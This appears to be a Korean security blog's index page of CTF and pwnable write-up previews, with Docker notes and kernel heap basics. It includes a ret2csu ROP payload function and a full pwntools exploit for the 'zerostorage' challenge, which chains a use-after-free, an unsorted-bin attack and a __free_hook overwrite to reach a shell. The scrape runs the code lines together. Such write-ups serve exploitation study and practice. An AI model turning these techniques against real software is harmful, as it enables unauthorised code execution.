aht7525

docker run -it –name “원하는 이름” “원하는 이미지” /bin/bash Docker 만든 컨테이너 다시 실행 docker restart ‘컨테이너 이름’ docker attach ‘컨테이너 이름’ Docker cp 호스트 -> 컨테이너 docker cp [host 파일경로] [container name]:[container 내부 경로] 컨테이너 -> 호스트 docker cp [container name]:[container 내부 경로] [host 파일경로] Docker 실행중인 프로세스 보기... [Read More]

Kernel UAF Kernel의 힙 할당 커널은 kmalloc(), kfree()를 통해 Kernel 영역에 heap 메모리를 할당, 해제하는 방식이다. Kmalloc 1void *kmalloc(size_t size, gfp_t flags);cs 첫번째 인자값은 할당 크기를 전달 두번째 인자값은 할당 할 메모리의 유형 기본적으로 Kernel에 메모리를 할당하기 위해 GFP_KERNEL을 사용 https://www.kernel.org/doc/htmldocs/kernel-api/API-kmalloc.html Kfree 1void kfree(const void * objp);cs Kmalloc으로 할당된 포인터 주소를 전달 메모리 해제 https://github.com/genodelabs/linux_drivers/blob/master/src/lib/dde_linux26/arch/dde_kit/kmalloc.c Kernel UAF(CISCN2017 babydriver)... [Read More]

pwnable.tw break_out punish 함수를 이용하여 힙의 구조체를 free note함수로 free된곳 uaf note주소 컨트롤 가능 realloc을 통해 unsortedbin 생성 및 libc leak house of orange get shell

ret2csu 1234567891011121314def csu(rbx, rbp, r12, r13, r14, r15, last):    # pop rbx,rbp,r12,r13,r14,r15    # rbx should be 0,    # rbp should be 1,enable not to jump    # r12 should be the function we want to call    # rdi=edi=r15d    # rsi=r14    # rdx=r13    payload = 'a' * 0x80 + fakeebp    payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(        r13) + p64(r14) + p64(r15)    payload += p64(csu_front_addr)    payload += 'a' * 0x38    payload += p64(last)Colored by Color Scriptercs [Read More]

ZeroStorage merge에서 취약점 발생 같은것을 합칠수 있음(uaf) unsorted bin attack으로 global_max_fast를 덮는다(global_max_fast의 값보다 작은 힙들은 모두 fast bin 처럼 사용 가능) free_hook을 덮고 exploit 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091from pwn import * def insert(length,data):        sla(':','1')        sla(':',str(length))        sa(':',data) def update(idx,length,data):        sla(':','2')        sa(':',data) def merge(idx1,idx2):        sla(':','3')        sla(':',str(idx1))        sla(':',str(idx2)) def delete(idx):        sla(':','4')        sla(':',str(idx)) def view(idx):        sla(':','5')        sla(':',str(idx)) def list():        sla(':','6') r=process('./zerostorage')e=ELF('./zerostorage')libc=e.libc sla = lambda x,y : r.sendlineafter(x,y)sa = lambda x,y : r.sendafter(x,y)ru = lambda x : r.recvuntil(x) insert(0x40,'A'*0x40)#0insert(0xf8,'B'*0xf8)#1 merge(0,0)#2 view(2) ru('Entry No.2:\n')libc_leak = u64(ru('\x7f')+'\x00\x00') - 0x3c4b78log.info(hex(libc_leak)) #global_max_fast editglobal_max_fast = libc_leak + 0x3c67f8log.info('Global_max_fast : '+hex(global_max_fast)) update(2,0x20,p64(0xdeadbeef)+p64(global_max_fast-0x10)+'A'*0x10)insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0 '''0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x00000000insert(0x10,'/bin/sh\x00'+'\x00'*0x8)#0'''0x7faab01147e8 <free_list>:     0x00000000      0x00000000      0x00000000      0x000000000x7faab01147f8 <global_max_fast>:       0xb0112b78      0x00007faa      0x00000000      0x000000000x7faab0114808 <root>:  0x00000000      0x00000000      0x00000000      0x000000000x7faab0114818 <old_realloc_hook>:      0x00000000      0x00000000      0x00000000      0x000000000x7faab0114828 <old_malloc_hook>:       0x00000000      0x00000000      0x00000000      0x000000000x7faab0114838 <added_atexit_handler.9387>:     0x00000000      0x00000000      0x00000000      0x00000000'''#update(2,0x20,p64(libc_leak+0x3c4b78)*2+'A'*0x10)merge(1,1)#3free_hook = libc_leak + libc.symbols['__free_hook']oneshot = libc_leak + libc.symbols['system']log.info(hex(free_hook))log.info(hex(oneshot))'''0x7fb2faf3574f: 0x00000000      0x00000000      0x00000200      0x000000000x7fb2faf3575f: 0x00000000      0x00000000      0x00000000      0x000000000x7fb2faf3576f <list_all_lock+15>:      0x00000000      0x00000000      0x00000000      0x000000000x7fb2faf3577f <_IO_stdfile_2_lock+15>: 0x00000000      0x00000000      0x00000000      0x000000000x7fb2faf3578f <_IO_stdfile_1_lock+15>: 0x00000000      0x00000000      0x00000000      0x000000000x7fb2faf3579f <_IO_stdfile_0_lock+15>: 0x00000000      0x00000000      0x00000000      0x000000000x7fb2faf357af <__free_hook+7>: 0x00000000      0x00000000      0x00000000      0x00000000'''update(3,0x1f8,p64(free_hook-0x59)+p64(0xdeadbeef)+'A'*(0x1f8-0x10))insert(0x1f8,p64(free_hook-0x59)+'\x00'*(0x1f8-0x8))insert(0x1f8,'\x00'*0x49+p64(oneshot)+'\x00'*(0x1f8-(0x49+8)))delete(0)r.interactive()Colored by Color Scriptercs [Read More]